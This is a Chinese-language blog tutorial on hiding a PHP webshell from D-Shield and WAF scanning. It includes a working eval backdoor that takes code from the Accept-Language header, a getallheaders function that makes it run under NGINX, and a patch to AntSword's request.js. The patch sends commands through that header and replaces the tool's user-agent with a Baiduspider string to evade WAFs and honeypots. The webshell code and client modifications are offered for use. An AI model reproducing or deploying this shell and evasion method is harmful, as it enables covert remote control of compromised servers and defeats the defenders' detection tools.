改造中国蚁剑AntSword之轻松过狗

原创文章,转载希望带个版权,谢谢

1,过狗 PHP 一句话

现在的防护软件，对GET和POST检查很严格

用php混淆，编写function，定义class来绕过这些防护软件，熟悉php的人对绕过这些软件还是比较容易的。

我们这里就不多说明了，

我们先来了解一下PHP的 超全局变量

这些里面有一些是我们可控的,那么我们可以利用里面任意一个可控的去发送数据,别老盯着POST,GET。

我们这里就随便选用一个

@eval($_SERVER['HTTP_ACCEPT_LANGUAGE']);

我们用浏览器语言来发送执行代码

但是很可惜被D盾杀了

成功躲过了D盾查杀

这个代码还是比较短小精悍的.

但是使用起来不方便，要自己每次修改浏览器language去执行shell,还不能对NGINX使用。

我们来继续解决这两个用户 “痛点”

2.改造中国蚁剑/AntSword

先来解决NGINX不支持的问题

我们自己写个function吧

<?php
if (!function_exists('getallheaders')) {
function getallheaders() {
$headers = array();
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}    }
return $headers;
}
}
@eval(getallheaders()['Accept-Language']);
?>

D盾还是不杀的

接下来解决第二个用户痛点

我们来修改下中国蚁剑AntSword

让它能控制上面这个shell

上一篇讲过

https://www.3hack.com/tools/17.html

中国蚁剑AntSword要修改下user-agent

要注意的是
软件默认的user-agent是
User-Agent: antSword/v2.0
大部分人都不会去自定义useragent
这就给waf和蜜罐白送了一个特征
所以我们要修改一下源代码
修改项目内
antSword-2.0.2modulesrequest.js （17行一处）
antSword-2.0.2modulesupdate.js （两处）
Baiduspider-image
我改成列百度图片蜘蛛

这次我们还是修改 request.js

这是AntSword的发包核心模块

我们找到

const _postData = Object.assign({}, opts.body, opts.data);
_request

变成

const _postData = Object.assign({}, opts.body, opts.data);
_request.set('Accept-Language',_postData[1]);
_request

重启AntSword

我们编辑下shell， 密码要是1 ，为了更好的过WAF

我们把编码模式也改成 chr

我们先关闭一句话，来记录下文件，看看shell收到的内容

在AntSword里面双击shell，再看看记录的txt

!!!分割的，上面是post的内容，下面是language的内容

我们发现是一样的了，说明程序发了两份代码，一份在language内，还是会发一份post给shell

这样有个好处,就是post的一句话也照样执行。

我们打开shell来看看

发现可以了，再头部language里面执行一句话，也可以用软件来控制了

来试试虚拟终端,也ok